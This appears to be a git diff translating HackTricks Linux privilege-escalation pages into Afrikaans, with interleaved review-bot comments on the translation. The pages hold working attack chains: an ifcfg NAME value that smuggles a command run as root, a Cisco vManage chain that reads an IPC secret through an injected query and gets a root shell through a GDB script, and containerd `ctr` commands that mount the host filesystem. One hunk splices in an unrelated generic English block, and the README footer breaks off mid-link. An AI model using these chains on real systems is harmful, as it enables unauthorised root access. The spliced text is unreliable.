page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +Gedetailleerde inligting oor die swakheid kan op hierdie bladsy gevind word: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). 
-You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). +Jy kan hierdie swakheid uitbuit met [**logrotten**](https://github.com/whotwagner/logrotten). -This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks. +Hierdie swakheid is baie soortgelyk aan [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx-loglêers),** so wanneer jy vind dat jy loglêers kan wysig, kyk wie bestuur daardie loglêers en kyk of jy bevoegdhede kan verhoog deur die loglêers met simboleerders te vervang. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) -**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) +**Swakheid verwysing:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) -If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**. +As, om watter rede ookal, 'n gebruiker in staat is om 'n `ifcf-` skripsie na _/etc/sysconfig/network-scripts_ **te skryf** of 'n bestaande een **aan te pas**, dan is jou **sisteem pwned**. -Network scripts, _ifcg-eth0_ for example are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d). +Netwerkskripsies, byvoorbeeld _ifcg-eth0_, word gebruik vir netwerkverbindings. Hulle lyk presies soos .INI-lêers. 
Tog word hulle op Linux \~gebron\~ deur Network Manager (dispatcher.d). -In my case, the `NAME=` attributed in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**. - -For example: _/etc/sysconfig/network-scripts/ifcfg-1337_ +In my geval word die `NAME=` aanduiding in hierdie netwerkskripsies nie korrek hanteer nie. As jy **wit/leë spasie in die naam het, probeer die stelsel om die gedeelte na die wit/leë spasie uit te voer**. Dit beteken dat **alles na die eerste leë spasie as root uitgevoer word**. +Byvoorbeeld: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash NAME=Network /bin/id ONBOOT=yes DEVICE=eth0 ``` +(_Merk die leë spasie tussen Network en /bin/id_) -(_Note the blank space between Network and /bin/id_) +### **init, init.d, systemd, en rc.d** -### **init, init.d, systemd, and rc.d** +Die gids `/etc/init.d` is die tuiste van **skripsies** vir System V init (SysVinit), die **klassieke Linux-diensbestuurstelsel**. Dit sluit skripsies in om dienste te `begin`, `stop`, `herlaai`, en soms `herlaai`. Hierdie kan direk uitgevoer word of deur simboliese skakels in `/etc/rc?.d/` gevind word. 'n Alternatiewe pad in Redhat-stelsels is `/etc/rc.d/init.d`. -The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. +Aan die ander kant word `/etc/init` geassosieer met **Upstart**, 'n nuwer **diensbestuurstelsel** wat deur Ubuntu bekendgestel is en konfigurasie lêers vir diensbestuurstake gebruik. 
Ten spyte van die oorgang na Upstart, word SysVinit-skripsies steeds gebruik saam met Upstart-konfigurasies as gevolg van 'n verenigbaarheidslaag in Upstart. -On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** introduced by Ubuntu, using configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart. +**systemd** tree na vore as 'n moderne inisialisering en diensbestuurder en bied gevorderde funksies soos aanvraaggedrewe daemonbegin, outomatiese bergbestuur en stelseltoestand-snapshots. Dit organiseer lêers in `/usr/lib/systemd/` vir verspreidingspakette en `/etc/systemd/system/` vir administratiewe wysigings, wat die stelseladministrasieproses stroomlyn. -**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. +## Ander Truuks -## Other Tricks - -### NFS Privilege escalation +### NFS Privilege-escalation {% content-ref url="nfs-no_root_squash-misconfiguration-pe.md" %} [nfs-no\_root\_squash-misconfiguration-pe.md](nfs-no\_root\_squash-misconfiguration-pe.md) {% endcontent-ref %} -### Escaping from restricted Shells +### Ontsnapping uit beperkte Skille {% content-ref url="escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](escaping-from-limited-bash.md) 
@@ -1633,31 +1724,31 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service [cisco-vmanage.md](cisco-vmanage.md) {% endcontent-ref %} -## Kernel Security Protections +## Kernel Sekuriteitsbeskerming * [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) * [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) -## More help +## Meer hulp -[Static impacket binaries](https://github.com/ropnop/impacket\_static\_binaries) +[Statiese impacket binêre lêers](https://github.com/ropnop/impacket\_static\_binaries) -## Linux/Unix Privesc Tools +## Linux/Unix Privesc-hulpmiddels -### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **Die beste hulpmiddel om te soek na Linux plaaslike voorregverhogingsvektore:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) -**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ +**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t opsie)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ -**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ +**Kernelpop:** Enumereer kernelkwetsbaarhede in Linux en MAC 
[https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local\_exploit\_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ -**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ -**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) +**EvilAbigail (fisiese toegang):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ +**Versameling van meer skrips**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## References +## Verwysings * [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\ * [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)\ @@ -1679,14 +1770,11 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RU diff --git a/linux-hardening/privilege-escalation/cisco-vmanage.md b/linux-hardening/privilege-escalation/cisco-vmanage.md index fb5112cb2..ccc49aca0 100644 --- a/linux-hardening/privilege-escalation/cisco-vmanage.md +++ b/linux-hardening/privilege-escalation/cisco-vmanage.md @@ -2,34 +2,31 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Path 1 +## Pad 1 -(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)) - -After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries (accessible with an account on the Cisco website), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`: +(Voorbeeld van [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)) +Nadat ons 'n bietjie deur 'n paar [dokumentasie](http://66.218.245.39/doc/html/rn03re18.html) gekrap het wat verband hou met `confd` en die verskillende binnerwerke (toeganklik met 'n rekening op die Cisco-webwerf), het ons gevind dat dit 'n geheim gebruik wat in `/etc/confd/confd_ipc_secret` geleë is om die IPC-aansluiting te verifieer: ``` -vmanage:~$ ls -al /etc/confd/confd_ipc_secret +vmanage:~$ ls -al /etc/confd/confd_ipc_secret -rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret ``` - -Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability: - +Onthou ons Neo4j-instantie? Dit word uitgevoer onder die voorregte van die `vmanage`-gebruiker, wat ons in staat stel om die lêer te herwin deur gebruik te maak van die vorige kwesbaarheid: ``` GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1 -Host: vmanage-XXXXXX.viptela.net +Host: vmanage-XXXXXX.viptela.net 
@@ -37,13 +34,11 @@ Host: vmanage-XXXXXX.viptela.net "data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]} ``` - -The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell: - +Die `confd_cli` program ondersteun nie opdraglyn-argumente nie, maar roep `/usr/bin/confd_cli_user` aan met argumente. So, ons kan direk `/usr/bin/confd_cli_user` oproep met ons eie stel argumente. Tog is dit nie leesbaar met ons huidige bevoegdhede nie, so ons moet dit van die rootfs herwin en dit gebruik om dit met behulp van scp te kopieer, die hulp lees en dit gebruik om die skul te kry: ``` vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret -vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret +vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret vManage:~$ /tmp/confd_cli_user -U 0 -G 0 
@@ -57,15 +52,13 @@ vManage:~# id uid=0(root) gid=0(root) groups=0(root) ``` +## Pad 2 -## Path 2 +(Voorbeeld van [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)) -(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)) - -The blog¹ by the synacktiv team described an elegant way to get a root shell, but the caveat is it requires getting a copy of the `/usr/bin/confd_cli_user` which is only readable by root. I found another way to escalate to root without such hassle. - -When I disassembled `/usr/bin/confd_cli` binary, I observed the following: +Die blog¹ deur die synacktiv-span het 'n elegante manier beskryf om 'n root-skulp te kry, maar die addertjie is dat dit 'n kopie van die `/usr/bin/confd_cli_user` vereis wat slegs deur root leesbaar is. Ek het 'n ander manier gevind om na root te eskaleer sonder so 'n gedoente. +Toe ek die `/usr/bin/confd_cli` binêre kode ontleed het, het ek die volgende waargeneem: ``` vmanage:~$ objdump -d /usr/bin/confd_cli … snipped … 
@@ -94,46 +87,63 @@ vmanage:~$ objdump -d /usr/bin/confd_cli 4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt> … snipped … ``` - -When I run “ps aux”, I observed the following (_note -g 100 -u 107_) - +Wanneer ek "ps aux" uitvoer, het ek die volgende waargeneem (_note -g 100 -u 107_) ``` -vmanage:~$ ps aux +vmanage:~$ ps aux … snipped … root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash … snipped … ``` +Ek het vermoed dat die "confd\_cli" program die gebruikers-ID en groep-ID wat dit van die ingelogde gebruiker versamel het, aan die "cmdptywrapper" toepassing deurgee. -I hypothesized the “confd\_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application. +My eerste poging was om die "cmdptywrapper" direk uit te voer en dit te voorsien met `-g 0 -u 0`, maar dit het misluk. Dit blyk dat 'n lêerbeskrywer (-i 1015) êrens langs die pad geskep is en ek kan dit nie vervals nie. -My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it. +Soos genoem in synacktiv se blog (laaste voorbeeld), ondersteun die `confd_cli` program nie opdraglynargumente nie, maar ek kan dit beïnvloed met 'n debugger en gelukkig is GDB ingesluit op die stelsel. -As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system. - -I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly. 
+Ek het 'n GDB-skripsie geskep waar ek die API `getuid` en `getgid` gedwing het om 0 terug te gee. Aangesien ek reeds "vmanage"-bevoegdheid het deur die deserialisering RCE, het ek toestemming om die `/etc/confd/confd_ipc_secret` direk te lees. root.gdb: - ``` set environment USER=root define root - finish - set $rax=0 - continue +finish +set $rax=0 +continue end break getuid commands - root +root end break getgid commands - root +root end run ``` +# Cisco vManage -Console Output: +## Introduction +Cisco vManage is a cloud-based network management platform that provides centralized control and visibility for Cisco SD-WAN deployments. It allows network administrators to monitor and configure network devices, troubleshoot issues, and manage network policies. + +## Privilege Escalation + +Privilege escalation refers to the process of gaining higher levels of access or privileges on a system or network. In the context of Cisco vManage, privilege escalation can allow an attacker to gain administrative access to the platform, potentially compromising the entire SD-WAN deployment. + +## Exploiting Vulnerabilities + +To escalate privileges in Cisco vManage, an attacker can exploit vulnerabilities in the platform or its underlying components. This can include exploiting misconfigurations, weak passwords, or software vulnerabilities. + +## Mitigation + +To mitigate the risk of privilege escalation in Cisco vManage, it is important to follow security best practices. This includes: + +- Regularly updating the platform and its components with the latest security patches. +- Enforcing strong password policies and using multi-factor authentication. +- Implementing network segmentation to limit the impact of a potential compromise. +- Monitoring the platform for any suspicious activity or unauthorized access attempts. + +By following these best practices, organizations can reduce the risk of privilege escalation and enhance the security of their Cisco SD-WAN deployments. 
``` vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli GNU gdb (GDB) 8.0.1 @@ -167,15 +177,14 @@ root uid=0(root) gid=0(root) groups=0(root) bash-4.4# ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
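Review bot: the init.d sentence in the linux-hardening README hunk that ends just before `@@ -1633,31 +1724,31 @@` translates the literal init-script actions inside the code spans and collapses two of them into the same word: `start`, `stop`, `restart`, `reload` became "`begin`, `stop`, `herlaai`, en soms `herlaai`". Those are the arguments an init script actually accepts, so keep them verbatim, e.g. "Dit sluit skrips in om dienste te `start`, `stop`, `restart` en soms `reload`." The same hunk renders "scripts" as "skripsies" (a short thesis in Afrikaans) while a later hunk of the same file uses "skrips" ("Versameling van meer skrips"); use "skrip(s)" throughout. "outomatiese bergbestuur" for "automount management" in the systemd paragraph is also off; the containerd hunk of this patch uses "gekoppel" for mount, so "outomatiese koppelbestuur" fits.

Review bot: the footer rewrite in the `@@ -1679,14 +1770,11 @@` hunk is truncated. The translated Discord bullet stops mid-URL at `(https://discord.gg/hRep4RU` (the removed line has `https://discord.gg/hRep4RUj7f`), and the removed "Share your hacking tricks by submitting PRs..." bullet and the trailing footer lines get no `+` replacement, so the page would end on a broken link. Regenerate this hunk so it matches the complete translated footer the same patch writes to cisco-vmanage.md and containerd-ctr-privilege-escalation.md.

Review bot: "die verskillende binnerwerke" in the cisco-vmanage.md `@@ -2,34 +2,31 @@` hunk mistranslates "binaries" ("binnerwerke" means inner workings); the README hunk of this same patch uses "binêre lêers", so use that here as well.

Review bot: in the `@@ -37,13 +34,11 @@` hunk, "om die skul te kry" is a typo for "skulp" (the Path 2 hunk has "root-skulp"), and "ons moet dit van die rootfs herwin en dit gebruik om dit met behulp van scp te kopieer" reorders the original steps (retrieve from the rootfs, copy with scp, read the help, use it to get the shell) into "retrieve it and use it to copy it with scp". Suggest "ons moet dit uit die rootfs haal, dit met scp kopieer, die hulp lees en dit gebruik om die skulp te kry".

Review bot: the `@@ -94,46 +87,63 @@` hunk replaces the line "Console Output:" with an unrelated English block ("# Cisco vManage", "## Introduction", ..., "## Mitigation") that lands between the closing fence of root.gdb and the opening fence of the gdb session, so the page loses the label for the console transcript and gains generic, untranslated text that is not part of the article (the `-46`/`+63` line counts are the giveaway). Drop the inserted block and keep a translated label such as "Konsole-uitvoer:". Two smaller points in the same hunk: the bodies of `define root` and the two `commands` blocks lose their indentation (`- finish` becomes `+finish`), which GDB accepts but is a change to a code block that a translation should not make; and "(_note -g 100 -u 107_)" keeps the English "note" and cites `-u 107` while the quoted `ps aux` line shows `-g 100 -u 1007` (the mismatch exists in the English source too, but since the line is being rewritten anyway, `-u 1007` is the value the transcript supports).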
diff --git a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index da54bc183..240b0b24e 100644 --- a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -1,22 +1,22 @@ -# Containerd (ctr) Privilege Escalation +# Containerd (ctr) Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic information +## Basiese inligting -Go to the following link to learn **what is containerd** and `ctr`: +Gaan na die volgende skakel om uit te vind **wat is containerd** en `ctr`: {% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} [2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md) 
@@ -24,38 +24,30 @@ Go to the following link to learn **what is containerd** and `ctr`: ## PE 1 -if you find that a host contains the `ctr` command: - +As jy vind dat 'n gasheer die `ctr`-opdrag bevat: ```bash which ctr /usr/bin/ctr ``` - -You can list the images: - +Jy kan die beelde lys: ```bash ctr image list -REF TYPE DIGEST SIZE PLATFORMS LABELS -registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - -registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - +REF TYPE DIGEST SIZE PLATFORMS LABELS +registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - +registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - ``` - -And then **run one of those images mounting the host root folder to it**: - +En voer dan **een van daardie images uit de waarin die gasheer se hoofmap gekoppel word**: ```bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash ``` - ## PE 2 -Run a container privileged and escape from it.\ -You can run a privileged container as: - +Voer 'n bevoorregte houer uit en ontsnap daaruit.\ +Jy kan 'n bevoorregte houer uitvoer as: ```bash - ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash +ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash ``` - -Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**: +Dan kan jy van sommige van die tegnieke gebruik maak wat genoem word op die volgende bladsy om daaruit te 
ontsnap deur bevoorregte vermoëns te misbruik: {% content-ref url="docker-security/" %} [docker-security](docker-security/) @@ -63,14 +55,14 @@ Then you can use some of the techniques mentioned in the following page to **esc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) 